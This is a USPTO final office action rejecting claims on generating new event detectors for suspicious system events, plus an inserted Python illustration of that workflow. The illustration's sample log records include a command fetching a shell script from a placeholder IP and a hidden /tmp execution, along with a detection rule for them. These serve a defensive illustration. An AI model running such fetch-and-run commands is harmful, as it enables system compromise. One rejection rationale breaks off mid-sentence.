Notice of Pre-AIA or AIA Status
The present application, filed on or after March 16, 2013, is being examined under the first inventor to file provisions of the AIA.
1. This is a Final Office Action in response to applicant’s amendment filed on December 16, 2021. At this time, claims 4-5, 7-8, 10 and 15 have been cancelled. Claims 1, 9, 13 and 16-18 have been amended. Therefore, claims 1-3, 6, 9, 11-14 and 16-20 are pending and addressed below.
Response to Amendments
As to Claims 1-3, 6, 9, 11-14 and 16-20, Applicants’ amendment of independent Claims 1, 13 and 18 with the newly added feature “sending, to a client device, a plurality of properties associated with the first system, including one or more: event properties associated with the suspicious system event, properties of the first system, or vulnerability properties, wherein the plurality of properties are displayed on a user interface comprising a plurality of user interface elements corresponding to the plurality of properties; receiving, from the client device, a selection indicator indicating a selected one or more properties of the plurality of properties by user input of one or more user interface elements;” [Claims 1-3, 6, 9, 11-14 and 16-20] has necessitated a new ground(s) of rejection in this Office action. Therefore, Applicants’ arguments filed on 12/16/2021 have been fully considered but are moot in view of the new ground(s) of rejection because the arguments do not apply to any of the updated reference(s) being used in the current rejection.
Claim Rejections - 35 USC § 103
The following is a quotation of 35 U.S.C. 103 which forms the basis for all obviousness rejections set forth in this Office action:
A patent for a claimed invention may not be obtained, notwithstanding that the claimed invention is not identically disclosed as set forth in section 102, if the differences between the claimed invention and the prior art are such that the claimed invention as a whole would have been obvious before the effective filing date of the claimed invention to a person having ordinary skill in the art to which the claimed invention pertains. Patentability shall not be negated by the manner in which the invention was made.

Claims 1-3, 6, 9, 11-14, and 16-20 are rejected under 35 U.S.C. 103 as being unpatentable over Milazzo, US Pat. No. 20200186569, in view of Thomas, US Pat. No. 10129290.

Claims 1, 13 and 18. The combination of Milazzo and Thomas discloses a method, performed by one or more processors, (See abstract; The cognitive computing system processes the natural language content from the one or more corpora and the security event log data to identify attack characteristics applicable to the security event log data.) comprising:
receiving a plurality of system event records; (See [0070]; input data 114 from electronic content sources 102 external to the monitored computing environment 104)
processing the plurality of system event records using a set of event detectors to determine that a suspicious system event associated with a first system has occurred; (See [0072]; That is, the knowledge extracted by the cognitive computing system 112 from external sources 114 may be combined with information extracted from internal sources 116 to identify attack characteristic 120 which may then be used along with specific customer/client information and/or monitored computing environment information to identify that particular security events detected in the monitored computing environment are actual attacks or threats)
generating one or more new event detectors based on the selected one or more properties; (See [0032]; a SIEM rule generator of the SIEM rules management system generates a new SIEM rule specifying the attack characteristics extracted from the ingested information)
and adding the one or more new event detectors to the set of event detectors. (See [0032]; the automatically generated SIEM rule generated by the SIEM may be stored in a SIEM rule repository)
Milazzo does not appear to explicitly disclose sending, to a client device, a plurality of properties associated with the first system, including one or more: event properties associated with the suspicious system event, properties of the first system, or vulnerability properties, wherein the plurality of properties are displayed on a user interface comprising a plurality of user interface elements corresponding to the plurality of properties; receiving, from the client device, a selection indicator indicating a selected one or more properties of the plurality of properties by user input of one or more user interface elements.
Thomas, however, discloses this feature (sending, to a client device, a plurality of properties associated with the first system, including one or more: event properties associated with the suspicious system event, properties of the first system, or vulnerability properties, wherein the plurality of properties are displayed on a user interface comprising a plurality of user interface elements corresponding to the plurality of properties). (See Thomas, Col. 22, lines 45-50; the security alert may indicate an internal attack (i.e., event properties) that originates from inside the enterprise 708, for example, from a desktop 724. In other instances, the security alert may indicate an external attack (i.e., event properties) that originates from outside the enterprise 708, for example, from the Internet 704. Operation 1308 may be executed following operation 1304. See Col. 25, lines 33-39; if one or more icons turn red, then the analyst knows there are negative findings on the IP/URL in question (i.e., properties), then when the analyst hovers over the icon he/she will see more summary information appear, like the name of the source of the negative finding within a particular category (i.e., properties). When the analyst then clicks on/selects the icon, they will be taken to a full report of the information (i.e., properties). See Col. 2, lines 45-55; further respond to the security threat by initiating at least one mapped preplanned response, the mapped preplanned response corresponding to a selection made by network security personnel. See also Col. 4, lines 19-30; display a plurality of network security element icons in a network security map; display a plurality of cyber-security countermeasure icons in the network security map; receive user input that correlates at least one of the network security element icons (i.e., event properties) with at least one of the cyber-security countermeasure icons; see Fig. 14, a plurality of display panels.)
receiving, from the client device, a selection indicator indicating a selected one or more properties of the plurality of properties by user input of one or more user interface elements; (See Col. 22, lines 33-39; In one embodiment, the reporting component 112 displays a graphical user interface with at least one icon that represents an identified source of the cyber-attack, receives user input that selects the at least one icon, and displays at least a portion of the expanded data set responsive to the user input. Expanded data sets are discussed in more detail in connection with FIGS. 13 and 14.)
Milazzo and Thomas are analogous art because they are from the same field of endeavor which is intrusion detection. It would have been obvious to a person of ordinary skill in the art at the time the invention was made to modify the invention of Milazzo with the teaching of Thomas to include the 
Claim 9. The combination of Milazzo and Thomas discloses the method of claim 1, wherein the vulnerability properties indicate one or more known security vulnerabilities of the first system on which the suspicious system event occurred. (See [0070-0071] and [0048])
Claim 11. The combination of Milazzo and Thomas discloses the method of claim 1, comprising:
receiving a second plurality of system event records; (See [0070]; event from external data 114 and internal data 114) 
and determining a second one or more system event records of the second plurality of system event records to be indicative of an occurrence of a second suspicious system event based on the one or more new event detectors. (See [0070])  
Claim 12. The combination of Milazzo and Thomas discloses the method of claim 11, further comprising sending a plurality of properties associated with the second suspicious system event to the client device.
Claim 16. The combination of Milazzo and Thomas discloses the computing system of claim 13, wherein the vulnerability properties indicate one or more known security vulnerabilities of the first system on which the suspicious system event occurred. (See Thomas, Col. 22, lines 45-50; the security alert may indicate an internal attack that originates from inside the enterprise 708, for example, from a desktop 724. In other instances, the security alert may indicate an external attack that originates from outside the enterprise 708, for example, from the Internet 704. Operation 1308 may be executed following operation 1304.)

Claim 17. The combination of Milazzo and Thomas discloses the computing system of claim 13, wherein the operations further comprise: receiving, from the server, a plurality of properties associated with a second suspicious system event, wherein the server has determined that the second suspicious system event has occurred based on one or more new event detectors, (See [0020], [0032], [0070], [0074])
and displaying the plurality of properties associated with the second suspicious system event. (See Thomas, Col. 4, lines 19-30; display a plurality of network security element icons in a network security map; display a plurality of cyber-security countermeasure icons in the network security map; receive user input that correlates at least one of the network security element icons with at least one of the cyber-security countermeasure icons; see Fig. 14, a plurality of display panels.)
Milazzo and Thomas are analogous art because they are from the same field of endeavor, which is intrusion detection. It would have been obvious to a person of ordinary skill in the art at the time the invention was made to modify the invention of Milazzo with the teaching of Thomas to include the display panels because it would have allowed enforcing policy updates to perimeter defense assets to block threat actors from causing further damage. (See Thomas, Col. 1, lines 65-66.)
Claim 19. The combination of Milazzo and Thomas discloses the computer readable medium of claim 18, wherein the plurality of system event records comprise system log records. (See [0008]; and security event log data from a monitored computing environment.)
Claim 20. The combination of Milazzo and Thomas discloses the computer readable medium of claim 18, wherein the plurality of system event records comprise records generated by a security monitoring application. (See [0008]; and security event log data from a monitored computing environment.)
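As an added illustration (not part of this Office Action nor code from the Milazzo or Thomas references), the following Python models the claimed workflow: a set of event detectors over system log records, a suspicious event on a first system, the event, system and vulnerability properties that would be sent to the client, and a new detector generated from the properties the user selects and added to the set, then run over a second plurality of records as in claim 11. Hostnames, record field names and property values are constructed assumptions.

```python
from typing import Callable, Dict, List, Optional

Record = Dict[str, str]
Detector = Callable[[Record], bool]

# Constructed sample log records; hosts, fields and values are assumptions.
FIRST_BATCH: List[Record] = [
    {"host": "web-01", "process": "sshd", "action": "login_failed"},
    {"host": "web-01", "process": "bash", "action": "exec", "cmd": "curl http://203.0.113.9/a.sh"},
    {"host": "db-02", "process": "postgres", "action": "query"},
]
SECOND_BATCH: List[Record] = [
    {"host": "db-03", "process": "cron", "action": "exec", "cmd": "logrotate"},
    {"host": "web-07", "process": "sh", "action": "exec", "cmd": "sh /tmp/.x"},
]
# Constructed properties of each monitored system and its known vulnerabilities.
SYSTEM_PROPS = {"web-01": {"role": "webserver"}, "web-07": {"role": "webserver"},
                "db-02": {"role": "database"}, "db-03": {"role": "database"}}
VULN_PROPS = {"web-01": {"outdated_openssh": "yes"}}  # placeholder, not a real advisory

def download_exec(r: Record) -> bool:
    """Initial detector: a shell executing something fetched over plain HTTP."""
    return r.get("action") == "exec" and "http://" in r.get("cmd", "")

def find_suspicious(records: List[Record], detectors: List[Detector]) -> Optional[Record]:
    """Processing step: return the first record flagged by any detector in the set."""
    return next((r for r in records if any(d(r) for d in detectors)), None)

def properties_for(event: Record) -> Dict[str, str]:
    """Properties sent to the client: event, first-system and vulnerability properties."""
    host = event["host"]
    props = {"event." + k: v for k, v in event.items()}
    props.update({"system." + k: v for k, v in SYSTEM_PROPS.get(host, {}).items()})
    props.update({"vuln." + k: v for k, v in VULN_PROPS.get(host, {}).items()})
    return props

def detector_from_selection(props: Dict[str, str], selected: List[str]) -> Detector:
    """Generate a new detector that fires when a record shares the selected property values."""
    want = {k: props[k] for k in selected}
    def new_detector(r: Record) -> bool:
        return all(properties_for(r).get(k) == v for k, v in want.items())
    return new_detector

def run_workflow() -> Optional[Record]:
    """Claims 1 and 11 end to end: detect, send properties, select, generate, add, re-detect."""
    detectors: List[Detector] = [download_exec]
    first = find_suspicious(FIRST_BATCH, detectors)          # suspicious event on web-01
    props = properties_for(first)                            # sent to the client UI
    selection = ["event.action", "system.role"]              # user's selection indicator
    detectors.append(detector_from_selection(props, selection))
    return find_suspicious(SECOND_BATCH, detectors)          # second suspicious event on web-07
```

The second batch contains no HTTP download, so only the generated detector (exec on a webserver-role host) flags the web-07 record; the database host's cron job is left alone.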
Conclusion
The prior art made of record and not relied upon is considered pertinent to applicant's disclosure.
Alkhatib, US Pat. No. 20210026952, titled “Method for detecting occurrence of suspicious system event...”.
Applicant's amendment necessitated the new ground(s) of rejection presented in this Office action.  Accordingly, THIS ACTION IS MADE FINAL.  See MPEP § 706.07(a).  Applicant is reminded of the extension of time policy as set forth in 37 CFR 1.136(a).  
A shortened statutory period for reply to this final action is set to expire THREE MONTHS from the mailing date of this action.  In the event a first reply is filed within TWO MONTHS of the mailing date of this final action and the advisory action is not mailed until after the end of the THREE-MONTH shortened statutory period, then the shortened statutory period will expire on the date the advisory action is mailed, and any extension fee pursuant to 37 CFR 1.136(a) will be calculated from the mailing date of the advisory action.  In no event, however, will the statutory period for reply expire later than SIX MONTHS from the date of this final action. 
Any inquiry concerning this communication or earlier communications from the examiner should be directed to JOSNEL JEUDY whose telephone number is (571)270-7476.  The examiner can normally be reached on M-F 10:00-8:00.
Examiner interviews are available via telephone, in-person, and video conferencing using a USPTO supplied web-based collaboration tool. To schedule an interview, applicant is encouraged to use the USPTO Automated Interview Request (AIR) at http://www.uspto.gov/interviewpractice.

Information regarding the status of an application may be obtained from the Patent Application Information Retrieval (PAIR) system.  Status information for published applications may be obtained from either Private PAIR or Public PAIR.  Status information for unpublished applications is available through Private PAIR only.  For more information about the PAIR system, see https://ppair-my.uspto.gov/pair/PrivatePair. Should you have questions on access to the Private PAIR system, contact the Electronic Business Center (EBC) at 866-217-9197 (toll-free). If you would like assistance from a USPTO Customer Service Representative or access to the automated information system, call 800-786-9199 (IN USA OR CANADA) or 571-272-1000.

Date: 2/17/2022

/JOSNEL JEUDY/Primary Examiner, Art Unit 2438